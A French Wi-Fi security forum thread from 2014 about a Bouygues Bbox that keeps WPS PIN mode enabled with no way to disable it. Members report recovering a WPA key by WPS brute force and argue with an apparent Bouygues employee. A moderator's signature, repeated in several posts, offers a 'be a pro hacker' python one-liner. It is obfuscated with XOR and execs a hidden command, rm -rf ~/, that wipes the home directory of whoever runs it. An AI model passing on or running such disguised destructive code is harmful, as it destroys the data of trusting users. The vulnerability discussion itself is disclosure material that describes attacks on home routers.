Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-02-2014 12:36:20

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 245

Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Bouygues; ou l'incompétence et le foutage de gueule poussés à leur paroxysme

bouygues.png


Ah ils peuvent être fiers chez bouygues. roll
ils ont graissés la patte à tous les petits élus locaux pour pouvoir nous pourrir la vie avec leur ronds points et leurs bâtiments si moches que monsieur bouygues n'y mettrait même pas ses chiens.
Lorsque les bétonneurs font du wireless comme il construisent des tours HLM, lorsque la course au profit se mêle  à la condescendance et au manque de respect total envers les consommateurs vous obtenez Bouygues telecom.

Ils crient au scandale quand free lance le 4G à des pris intéressants alors que ce qui est scandaleux c'est qu'on donne le droits à de tels malfrats de sévir ( il n'y pas d'autres termes ) sur le marché de l'internet


Comme vous le savez sans doutes, M1ck3y a révélé il y a quelques années de cela l'algorithme de génération des clefs WPA par défaut des B-Box technicolor-thomson Faille Bbox WPA (Bouygues Telecom): générateur Bbkeys (exclu: 0day)


Nous n'allons pas revenir sur le degrés incompétence ( ou de stupidité car on parle de "professionnels"  ) qu'implique utilisation d'un algorithme mis a jours il y a cinq ans, lui même basé sur celui mis en lumière par kevin devine il y a 6 ans ( si je ne me trompe pas dans les dattes )

Si vous ne savez pas programmer des firmwares, continuez à faire des cubes en béton.
Vous et vos ingénieurs de pacotilles n'avez pas le niveau requis messieurs bouygues
Les châteaux de sables c'est pour vous, le reste laissez le à des gens compétant

  Donc, me voilà chez mes parents avec leur magnifique B-box technicolor mise en service en 2013 avec leur super nouveau firmware annoncé avec fierté

Pas de changement dans algorithme de génération des clefs WPA, cinq ans pour changer quelque chose mais vous vous doutez bien que monsieur bouygues est trop occupé à corrompre des élus PS et UMP pour se préoccuper de vôtre sécurité.
Monsieur Bouygues pense que les gens sont des moutons et des cons et vous le fait savoir


Bon, ce n'est pas grave, nous allons modifier le pass de papa et maman et comme ça ils seront protégés

h_1391616639_7500307_ca0ba2349f.png

Ne serait-il pas mieux, si vous vous souciez de la sécurité de vos clients,  lorsque vous avez des personnes âgées qui n'y connaissent manifestement pas grand chose ( mais ça concerne aussi pas mal de jeunes ) de prendre deux minutes lors de la mise en place pour aider vos clients à configurer leurs routeurs?
et vous leur faite une jolie étiquette avec pass etc...
C'est ce que font les boites en Espagne comme R-Wlan, qui préfèrent "perdre" deux minutes par mise en place pour sécuriser le réseau de leur client.

donc admin-admin et nous allons à "sécurité"

j6ZhGfX.png


Jusque ici tout va bien, nous pouvons modifier la clef ( on sait jamais tongue ) et puis par rapport à des services "dangereux " comme DMZ Unpn etc... ils semblent être désactivés par défauts.

Sur l'étiquette de la box qui est posée sur la box je vois mon serial, mon pass wep/wpa ( qui est le même par défaut ) et mon essid
  Mission accomplie, réseau sécurisé.

  Comme vous le savez les réflexes de base à avoir sont
   
    - Changer la clef par défaut par une clef WPA robuste, c'est à dire
         -  Longue, plus de douze caractères, vous pouvez utiliser jusqu'à 63 caractères ascii donc lâchez vous )
         -  Qui mélange majuscules, minuscules, et caractères ascii spéciaux
         -  sans relation avec l'utilisateur permettant de l’ingénierie inversée  ( si vous êtes né à Poitou le 12 décembre, PoIToU12décembr3 n'est pas une très bonne clef, ceci dit il y a pire )

    - Changer les identifiants et pass d'accès à l'interface de configuration du point d'accès en appliquant au mieux les principes expliqués au dessus

    - Désactiver le WPS


Il n'y a pas de WPS dans l'interface de configuration, aucune mention faite ni aucune possibilité donnée pour configurer le WPS


  Nous allons tout de même lancer un scan WPS avec wpa_cli vite fait, "au cas où" l'impensable soit de mise

  Oups...
Première nouvelle il semble que nous ayons du WPS hmm

h_1391596287_9738533_703b5e3daa.png

nous regardons attentivement nos probes pour voir ce qui se passe

h_1391596619_1866721_5aa1447ae9.png

quand vous  voyez dans vos probes "2 configured" c'est que le WPS est bien activé ( des fois vous pouvez voir WPS avec wpa_cli et wash mais il n'est pas activé )

Ce qui est de "marrant" c'est qu’apparemment le mode PBC est présent mais il n'y aucun bouton sur la box pour l'utiliser....

Ce qui est moins marrant c'est de voir une attaque parfaitement menée, pas de blocage, quasiment aucune erreur alors que nous utilisons -d 0... ce qui nous donne la clef WPA du réseau

h_1391597404_2794135_3fd1e01b28.png

Nous ne pouvons donc pas utiliser nôtre b-box comme router, il faut désactiver le wireless.... ce qui veut dire changer d'ISP

en reexaminant la box je vois que sur une des étiquettes placée en dessous de la box apparaitre en petit le chose suivante

Wireless PIN 6493 -2378

alors c'est "poilant", vous avez trois étiquettes, les trois donnent la même info ( ssid - bssid -pass -serial ) et il y en a une sur les trois qui nous met wireless PIN avec un PIN qui est différent de celui qui nous a permis d'obtenir la clef.

essayons le
h_1391598093_7735496_31e43f6914.png
h_1391598222_9910396_c6c4d0d61a.png

Nous sommes dans le ridicule le plus complet, le PIN donné par Boiygues à ces clients n'est pas valide.... les Seules personnes capables de profiter du WPS... sont celles qui effectuent un brute force du WPS lol lol lol

Donc bouygues t'offre le WPS inamovible et non configurable avec un PIN surprise que tu dois trouver toi même

Aberrant et  scandaleuX; même les scénaristes d'Hélène et les garçons ( n'oublions pas le grand rôle joué par bouygues dans le rayonnement culturel français avec TF1 et le club dorothé lol:lol: ) auraient fait mieux

Conclusion : changez d'ISP, vous arrêterez des financer des mafieux qui vous prennent pour des cons et vive grâce à vos impôts
Et oui, ils décrient la fonction publique et l'intervention de économique de l'état mais on battit leur empire et leur fortune indécente en  se nourrissent de marchés publics qu'ils obtiennent grâce à la corruption,
C'est beau un monde bouygues, des apparats de merde, une télé de merde, des box de merde....



BOYCOTTEZ BOUYGUES!

OxRwmbL.png

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-02-2014 15:44:09

le dirdir
Membre d'Or
Inscription : 09-03-2013
Messages : 366

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Salut et merci pour ce bon moment de rigolade ! lol

Je propose d'envoyer les ingénieurs de Thomson aux jeux olympiques de la rigolade, je veux bien payer pour le supplément bagages au retour à cause des kilos de médailles et de coupes qu'ils vont rapporter.

La cerise sur le gâteau serait que le PIN soit le même sur toutes les Bbox.

[edit modo]spawn: remplacement d'un mot un peu osé avant d'inviter bouygues à répondre (:[/edit]

Dernière modification par spawn (07-02-2014 11:34:48)


Tant vaut l'antenne, tant vaut le poste

Hors Ligne

#3 05-02-2014 17:52:15

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

On va encore se faire des amis... big_smile

Hors Ligne

#4 05-02-2014 18:01:54

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

tl;dr : WPS non désactivable sur les bbox.
C'est triste.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 06-02-2014 06:29:35

petros
Membre Hyperactif
Inscription : 16-08-2013
Messages : 48

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

On peut se débarrasser du WPS en choisissant  pour WEP lol

Hors Ligne

#6 06-02-2014 07:53:25

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Sa fait un moment que j'avais fait cette découverte (que le WPS été activé, par défaut est  non configurable), au moment ou reaver est sorti.

J'avais comme FAI Bouygues, je me suis dit je vais tester, j'avais tester, (je n'ai pas pu récup ma WPA (non pas par  blocage de ma box, mais + par flemme d'attendre la fin de l'attaque), j'avais des autres tests avec mon laptop sous kali dans l'entourage familial qui eux n'étaient pas sous Bouygues, et eux leur box se bloquait au bout de quelque secondes/minutes.

Donc Bouygues , c'est comme de l’emmental, plus c'est troué mieux c'est, MDR.

En tout cas c'est pas la 1ère fois que Bouygues est largué pour leur sécurité wifi.

[edit modo]spawn :  correction de quelques fautes (: [/edit]

Dernière modification par spawn (07-02-2014 11:35:04)


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#7 06-02-2014 09:25:01

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 245

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

M1ck3y a écrit :

On va encore se faire des amis... big_smile

La politesse m'obligeait à faire un petit coucou à tes vieilles connaissances. tongue

Hors Ligne

#8 06-02-2014 15:01:39

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Ils m'ont répondu :
https://twitter.com/bouyguestelecom/sta … 6251026432

Bouygues a écrit :

Bonjour qolund, le WPS s'active uniquement en appuyant sur le bouton wifi de votre Bbox pendant un certain temps, pas en permanence.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#9 06-02-2014 15:08:05

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 245

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Trop bien  lol
Juste qu'il  n'y pas de bouton WPS sur cette b-box ( attention, celle-ci est une Bbox-XXXXXX Technicolor )
peut être alors en appuyant sur reset pendant moins de 5 segondes, pratique vu que c'est un bouton reset pour lequel vous nécessitez une aiguille pour pour pouvoir appuyer dessus
Et puis là on parle de WPS PIN mode pas de PBC. ( un certain temps étant deux minutes )
Il est au top Monsieur bouygues lol

Hors Ligne

#10 07-02-2014 02:40:54

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Je vous ai déjà dit qu'en 2014 on repart comme en quatorze smile

Dernière modification par Fuji (07-02-2014 15:52:16)

Hors Ligne

#11 07-02-2014 11:28:57

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

J'ai invité bouygues à venir en discuter.
Aussi je me permet d'arrondir quelques angles dans vos messages, ne m'en veuillez pas.
Soyons sérieux, polis et professionnels comme d'habitude (:
[edit : kcdtv je te laisse modifier toi même tes messages si tu le souhaites, je ne prendrais pas le risque d'inviter bouygues et de causer du tort au forum]


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#12 07-02-2014 12:01:42

le dirdir
Membre d'Or
Inscription : 09-03-2013
Messages : 366

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Je ne parlais pas de BT, mais de Thomson. tongue


Tant vaut l'antenne, tant vaut le poste

Hors Ligne

#13 07-02-2014 12:11:31

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Je crois malheureusement que bouygues ne viendra pas "perdre son temps" a discuter avec nous... hmm

Hors Ligne

#14 07-02-2014 13:44:04

le dirdir
Membre d'Or
Inscription : 09-03-2013
Messages : 366

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Ils auraient bien tort, on peut leur faire gagner beaucoup d'argent. Ils nous envoient leurs box et on la sécurise.

Linksys laisse bien à la communauté Open WRT le soin de mettre au point le firmware de leur routeur haut-de-gamme.


Tant vaut l'antenne, tant vaut le poste

Hors Ligne

#15 07-02-2014 23:23:53

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 245

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Désolé spawn mais je ne compte pas changer une seule virgule pour faire plaisir à monsieur bouygues....
Et je pense que tu a fais un erreur d'appréciation en modifiant les messages des autres utilisateurs.

edit : kcdtv je te laisse modifier toi même tes messages si tu le souhaites, je ne prendrais pas le risque d'inviter bouygues et de causer du tort au forum

Rappelle toi les faits Spawn, suppression d'hébergement pour crack-wifi en france après la sortie de bb-keys...
Know your enemy wink


Par contre ça me semble très intéressant amener le débats chez eux pour informer leurs clients grace au twist comme tu as fais , au lieu de "baisser nôtre froc" pour pouvoir parler avec eux chez nous...

Si cela te fait vraiment plaisir, je veux bien que tu mette le topic dans la trash temporairement pour parler avec ton invité, ceci dit une fois que vous avez conversé à vôtre aise, je le ressortirai wink

Hors Ligne

#16 23-02-2014 20:07:43

Aphid
Membre
Inscription : 23-02-2014
Messages : 15

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Hello,

spawn a écrit :

J'ai invité bouygues à venir en discuter.
Aussi je me permet d'arrondir quelques angles dans vos messages, ne m'en veuillez pas.
Soyons sérieux, polis et professionnels comme d'habitude (:
[edit : kcdtv je te laisse modifier toi même tes messages si tu le souhaites, je ne prendrais pas le risque d'inviter bouygues et de causer du tort au forum]

Le sujet est en cours d'analyse.
Si l'anomalie est confirmée, elle sera corrigée dans la release suivante.

Je ne me permettrais pas de répondre à kcdtv mais il est assez étonnant qu'un modérateur ne respecte pas la première consigne lorsque l'on s'inscrit. smile

1/ Langage "sms" et orthographe

Les membres du forum font l'effort de rédiger leurs messages avec soin, en utilisant un vocabulaire correct, des phrases rédigées comme il faut (majuscule au début de chaque phrase, accents, ponctuation), et en évitant autant que possible les fautes d'orthographe. Si vous postez un message du type "g 1 galere pr chopé le handshak keski fo q je f?", personne ne viendra à votre aide, étant donné qu'en négligeant la façon dont vous vous exprimez ce sont vos interlocuteurs que vous négligez. Rédigez vos messages avec soin et vous serez très bien reçu.


PS: Pour le bouton WPS:
Bouton Wi-Fi On/Off & WPS

Dernière modification par Aphid (23-02-2014 20:46:04)


La norme > l'interprétation de la norme > l'implémentation de l'interprétation

Hors Ligne

#17 23-02-2014 20:14:40

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Aphid a écrit :
spawn a écrit :

J'ai invité bouygues à venir en discuter.
Aussi je me permet d'arrondir quelques angles dans vos messages, ne m'en veuillez pas.
Soyons sérieux, polis et professionnels comme d'habitude (:
[edit : kcdtv je te laisse modifier toi même tes messages si tu le souhaites, je ne prendrais pas le risque d'inviter bouygues et de causer du tort au forum]

Le sujet est en cours d'analyse.
Si l'anomalie est confirmée, elle sera corrigée dans la release suivante.

Je ne me permettrais pas de répondre à kcdtv mais il est assez étonnant qu'un modérateur ne respecte pas la première consigne lorsque l'on s'inscrit. smile

1/ Langage "sms" et orthographe

Les membres du forum font l'effort de rédiger leurs messages avec soin, en utilisant un vocabulaire correct, des phrases rédigées comme il faut (majuscule au début de chaque phrase, accents, ponctuation), et en évitant autant que possible les fautes d'orthographe. Si vous postez un message du type "g 1 galere pr chopé le handshak keski fo q je f?", personne ne viendra à votre aide, étant donné qu'en négligeant la façon dont vous vous exprimez ce sont vos interlocuteurs que vous négligez. Rédigez vos messages avec soin et vous serez très bien reçu.


PS: Pour le bouton WPS:
http://www.giiks.com/wp-content/uploads … est-12.jpg



Bonjour et Bienvenu Monsieur wink


Moi c'est Henri wink


Et toi ?


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#18 23-02-2014 20:57:23

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

En étant chez bouygue depuis pas mal de temps (5 ans), j'ai remarquer que vous etes comme les routeur ZTE,

Troué et avec du retard

En ce qui concerne le bouton WPS, j'ai effectuer différent teste sur ma box, est le resultat été flagrant.

POWNED

( a chaque foit), donc ne venez pas dire que le WPS est parametrable,ou désactivable sur vos box.

Aphid a écrit :

Le sujet est en cours d'analyse.
Si l'anomalie est confirmée, elle sera corrigée dans la release suivante

Croyer moi elle esr bien confirmée, est ce sur tout les modéles.

PS: Merci de ne pas changer mes propos.


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#19 24-02-2014 01:42:44

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 245

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Bonjour et bienvenue à toi Aphid

Aphid a écrit :

Je ne me permettrais pas de répondre à kcdtv mais il est assez étonnant qu'un modérateur ne respecte pas la première consigne lorsque l'on s'inscrit. smile

1/ Langage "sms" et orthographe

Les membres du forum font l'effort de rédiger leurs messages avec soin, en utilisant un vocabulaire correct, des phrases rédigées comme il faut (majuscule au début de chaque phrase, accents, ponctuation), et en évitant autant que possible les fautes d'orthographe. Si vous postez un message du type "g 1 galere pr chopé le handshak keski fo q je f?", personne ne viendra à votre aide, étant donné qu'en négligeant la façon dont vous vous exprimez ce sont vos interlocuteurs que vous négligez. Rédigez vos messages avec soin et vous serez très bien reçu.

  Je vois que tu as lu la première règle de notre forum smile
  Par contre tu ne lies pas avec assez d'attention ce que j'ai écris et te trompes

des phrases rédigées comme il faut (majuscule au début de chaque phrase, accents, ponctuation)et en évitant autant que possible les fautes d'orthographe

Il y a des fautes, désolé, mais je fais des phrases correctes avec sujets, verbes, compléments, points et virgules.

Les membres du forum font l'effort de rédiger leurs messages avec soin, en utilisant un vocabulaire correct

  Le seul "gros mot" ( registre grossier, incorrect ) et le mot "merde" répété trois fois en fin de texte.

C'est beau un monde bouygues, des apparats de merde, une télé de merde, des box de merde....

  Mais il est largement  compensé par l'emploi du mot "paroxysme dans le titre"; donc ça va vis-à-vis de l'académie française. tongue
Tu confonds liberté d'expression et indignation légitime avec les injures gratuites et nôtre forum est aussi un lieu d'expression et de libre pensée, ce qui implique de temps en temps quelques gros mots, ce n'est pas bien grave si on pense à la situation dans laquelle vous mettez maintenant, en ce moment précis, des millions de clients en situation permanente de danger sur leur propre réseau.  hmm
 
Tu aurais peu être pu faire l'effort de lire un peu plus sur le forum pour t'imprégner de son état d'esprit avant de prétendre expliquer son règlement. wink

La Netiquette des Forums[/url a écrit :

]Lisez plusieurs messages du forum avant de poster. Cela vous aidera à acquérir une compréhension de la culture du groupe avec lequel vous souhaitez communiquer. Dans un cocktail, il ne vous viendrait pas à l’idée de parler à un groupe de personnes inconnues sans avoir écouté leurs conversations pendant quelques minutes

Je me permets d'attirer amicalement ton attention sur ce point :

7/ Le web et les règles de savoir vivre

Ce n'est pas parce que nous sommes sur le web que nous devons oublier quelques règles de savoir vivre en société. Ainsi, il est recommandé aux nouveaux membres de se présenter dans la section prévue à cet effet. La politesse et l'humour sont de rigueur sur le forum, toute discrimination sera sanctionnée, qu'elle soit basée sur le niveau en informatique ou autre. Ici nous ne tolérons pas qu'un membre se serve de ses connaissances en informatique pour rabaisser un débutant en le prenant de haut. Nous avons tous débuté un jour, il ne faut pas l'oublier...

  Je pense que dans ton cas ces quelques mots de présentations n'auraient vraiment pas été de trop surtout si il semble que tu parles "au nom de bouygues".
  Parler au nom d'une entreprise n'est pas chose à faire à la légère, tu engages la responsabilité de celle-ci par tes propos et pourrais en ternir l'image.
  Peut être que les consommateurs  bouygues de ce forum  auraient apprécié autres chose que deux phrases laconiques d'explication alors qu'ils sont victimes depuis un an d'une sécurité nulle avec pour seule solution d'éteindre le wifi.
   
en gros tu/vous nous dites que

Le sujet est en cours d'analyse.
Si l'anomalie est confirmée, elle sera corrigée dans la release suivante.

 
 
  Vos propos confirment ce que laissait présager vôtre réponse sur twitter: Si vous dites que c'est en cours d'analyse cela veut dire que vous n'avez à l'heure actuelle personne dans votre équipe qui sait réellement ce qu'est le WPS
  Vérifier la vulnérabilité prend quelques secondes
  Vous pourriez peut être vous montrer un peu moins soucieux du bon usage de la langue de Molière et nous remercier un petit peu pour vous informer sur une énorme faille de sécurité wink
       Pourtant, en cliquant sur le premier lien que vous obtenez dans google en mettant WPS ( la fameuse wikipedia ) vous auriez pu lire depuis le 25 décembre 2011

A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 pre-shared key.[4] Users have been urged to turn off the WPS feature,[5] although this may not be possible on some router models.[6]

   Je ne sais pas à quel niveau ça flanche; mais qu'une information aussi fondamentale ne soit jamais prise en compte dans la chaine d'exécution tient de l'absurde kafkaïen.
  Là normalement vous devriez avoir géré ça il y 3 ans en arrière... donc essayer de vous manier ( de vous dépêcher ), nous parlons de millions et millions d'éventuels préjudices moraux et financiers pour des clients qui peuvent être piratés à tout moment, il y a de quoi être très très préoccupé, malheureusement, il en va de la sécurité de millions de clients qui vous payent chaque moi. sad

  Nous prenons donc acte de que vous n'aviez jusque là aucune connaissance sur la faille sur le protocole WPS  - pourtant révélée en 2011 publiquement et reconnue par tous les fabriquants sérieux sur leur site depuis belle lurette - et qu'un très prochain update permettra d'arranger ce problème d'une gravité extrême.

  Nous espérons que vous nous tiendrez au courant et que vous allez réagir dans les plus brefs délais et avec l'énergie nécessaire, car pour le moment vous brillez par vos effroyables lacunes et nous invitez à résilier au plus vite nos abonnements hmm

PS

Merci pour la photo du bouton WPS, ce serait mieux si c'était écrit tongue
J'espère au passage que vous avez bien pensé en ce que supposait utiliser le WPS en mode PBC... et les risques intrinsèques  que comprend un protocole qui admet pendant x minutes n'importe le quel des dispositifs qui émet des paquets WPS PBC dans son rayon...
Un attaquant pourrait avec une attaque type DoS empêcher le traffic et faire "appuyer sur le bouton" et tout simplement en profiter pour se connecter lui aussi... et puis combiner cette attaque avec un rogue AP sauce Koala pour attirer les clients sur son réseau falsifié
Il pourrait alors réaliser un MITM parfaitement transparent en redirigeant le trafic du client  vers le net grâce à la connexion obtenue sur le PA  légitime ... belote, rebelote et dix de der...

Hors Ligne

#20 24-02-2014 09:10:18

Aphid
Membre
Inscription : 23-02-2014
Messages : 15

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Je ne parle pas au nom de Bouygues, je ne suis qu'un employé qui va s'assurer que ce sujet soit traité.
Je ne suis pas community manager , ni chargé de communication.

Pour la règle sur le forum, ou bien le renvoi vers la Netiquette, je parlais bien entendu des insultes envers les gens travaillant chez ou pour bouygues.

Il est vrai que je ne me suis pas présenté, mais vu le ton hostile de ce post. smile

Tout ce qui sera politique, commercial ou autre, je n'y répondrai pas. Seul l'aspect technique m’intéresse.

Vos propos confirment ce que laissait présager vôtre réponse sur twitter: Si vous dites que c'est en cours d'analyse cela veut dire que vous n'avez à l'heure actuelle personne dans votre équipe qui sait réellement ce qu'est le WPS
Mon propos indique que le sujet est en cours de traitement, rien d'autre.  Ce sujet m'a été remonté vendredi à 16h, donc patience. smile


Le produit ne devrait pas proposer le PIN comme méthode de WPS, pour la raison évoquée ci-dessus. Seule la méthode PBC devrait être implémentée (et ce depuis 2008 smile ).


Concernant l'attaque par WPS en mode PBC, il y a certainement des failles, mais les contraintes de sécurité imposant d'avoir des clés de plus en plus grosses, nécessitent une solution alternative pour le client lambda.

Cependant la norme Wifi indique que lors de la méthode PBC seul 1 client doit pouvoir s'authentifier. Si 2 STA tentent l'appairage , aucune des 2 ne devraient être connectées.
La led de la Bbox devrait passer à l'état rouge.

Nous regardons aussi si d'autres produits sont  touchés.


La norme > l'interprétation de la norme > l'implémentation de l'interprétation

Hors Ligne

#21 24-02-2014 11:57:52

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Merci beaucoup d'être passé ici, Aphid.
Tes messages en tant qu'employé de Bouygues ont beaucoup d'intérêt.
Je te souhaite la bienvenue ici, malgré le début houleux de ce post.
Je suis certain que kcdtv va faire des efforts pour être moins abrupt smile


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#22 24-02-2014 13:56:36

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Coucou,


La fete a commencer sans moi ici tongue

Ce qui me fait rire c'est la facilité qu'a ce cher Monsieur Aphid a faire l'autruche sur des sujets techniques et quand notre modérateur Kcdtv vient a tenir des propos un peu plus technique, ben il y a plus personne yikes ... mais c'est vrai que c'est plus facile de faire passer notre modo pour un impropre et un inculte big_smile

Je ne parle pas au nom de Bouygues, je ne suis qu'un employé qui va s'assurer que ce sujet soit traité.

Cette phrase m'a fendu le bide, alors quoi? on vient discuter un peu avec nous pour amuser la galerie et puis on passe a autre chose vite fait bien fait? ce qu'on attend ce sont des explications sur les longueurs de Bouygues a réagir et des détails techniques, des améliorations sur le sujet, du vrai.. pas qu'on se pointe ici comme si on aller au toilette en balançant une photo d'un bouton "WPS".


Aphid a écrit :

je parlais bien entendu des insultes envers les gens travaillant chez ou pour bouygues


Ne généralisons pas tout, c'est plus une critique a la politique de bouygues avec ses clients que des insultes.

Aphid a écrit :

Concernant l'attaque par WPS en mode PBC, il y a certainement des failles, mais les contraintes de sécurité imposant d'avoir des clés de plus en plus grosses, nécessitent une solution alternative pour le client lambda


Oui mais au moins une alternative sécurisée et non baclé.

Aphid a écrit :

Cependant la norme Wifi indique que lors de la méthode PBC seul 1 client doit pouvoir s'authentifier. Si 2 STA tentent l'appairage , aucune des 2 ne devraient être connectées.
La led de la Bbox devrait passer à l'état rouge.

Cette méthode devrait etre plus approfondie par exemple en laissant un temps d'authentification très court répondant a un certain signal donné et pas a tout le monde comme le précise Kcdtv.

Aphid a écrit :

Nous regardons aussi si d'autres produits sont  touchés

Il serait temps non?
J'ai le sens de la critique mais comprenez bien de votre coté que je serai le premier a revenir sur ce post pour vous féliciter si les choses changent et évoluent vers une box plus sûr smile


spawn a écrit :

Je suis certain que kcdtv va faire des efforts pour être moins abrupt


Je pense pas que abrupt signifie expliquer une aberration wink je trouve que Kcdtv a parfaitement expliquer la chose.

Dernière modification par koala (24-02-2014 13:57:22)

Hors Ligne

#23 24-02-2014 19:46:00

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

On se calme.

@kcdtv: tu ne portes visiblement pas cette entreprise dans ton coeur, c'est ton droit, mais certaines remarques contenues dans ce sujet sont tout de meme off topic. On s'intéresse aux faits, concrets, c'est à dire à une faille de sécurité sur un équipement Wireless. Autant rester focalisé sur cela, et ne pas s'égarer dans des considérations politiques ou autres, d'autant que Bouygues Telecom est une entité indépendante, faisant partie d'un groupe, et ne peut donc pas porter la responsabilité de toutes les autres activités du groupe. Comme je l'avais déja souligné, et tu l'as d'ailleurs évoqué à juste titre, il sont arrivés sur le marché de l'ADSL sur le tard, et dans leur empressement ils ont commis quelques erreurs. Ils n'ont visiblement pas tiré les leçons des erreurs passées, je pense que c'est clair. Pourtant il aurait suffit de suivre ce qui se passe sur le forum de temps en temps pour voir arriver de nouvelles failles et de nouveaux tools permettant de les exploiter, ce qui aurait du attirer l'attention des personnes en charge du développement software de la Bbox niveau Wifi.

@Aphid: merci de tes posts. Dans la mesure ou tu es juste venu t'exprimer en tant que personne privée, et pas en tant que porte parole de cette entreprise, tu dois etre traité avec respect, puisque ta démarche est tout de meme louable. Tu n'as pas à devoir porter tous les problèmes de cette entreprise sur tes épaules.

@spawn: merci de calmer le jeu smile

Donc, pour résumer brièvement et histoire de faire baisser les éventuelles tensions, je dirais simplement qu'il est plutot agréable de voir qu'une personne qui semble liée à l'entreprise ai pris l'initiative de venir discuter avc nous, meme si ce n'est pas de façon officielle c'est toujours mieux que rien et cela prouve qu'ils ont malgré tout du personnel sérieux et faisant preuve d'une certaine conscience professionnelle. Dans la mesure ou cette personne s'exprime à titre privé, elle n'a pas à subir des attaques liées à l'entreprise dans son ensemble. Autant profiter de sa présence pour discuter de façon posée justement.

Une petite vidéo pour rester cool.

Hors Ligne

#24 24-02-2014 23:20:29

petros
Membre Hyperactif
Inscription : 16-08-2013
Messages : 48

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Mais.... c'est une box la moins chère du marche.... God save the queen!
https://www.b-and-you.fr/box-internet.html

Hors Ligne

#25 24-02-2014 23:42:17

Aphid
Membre
Inscription : 23-02-2014
Messages : 15

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Tout d'abord merci M1ck3y pour ton intervention.

@koala


Cette méthode devrait etre plus approfondie par exemple en laissant un temps d'authentification très court répondant a un certain signal donné et pas a tout le monde comme le précise Kcdtv.

Les produits qui sont estampillés avec le logo WiFi doivent être certifiés par le WFA et donc respecter leur norme.
Le réel problème est le PinCode activé, toutes attaques via rogue AP ne peuvent être reprochées à l'AP légitime.
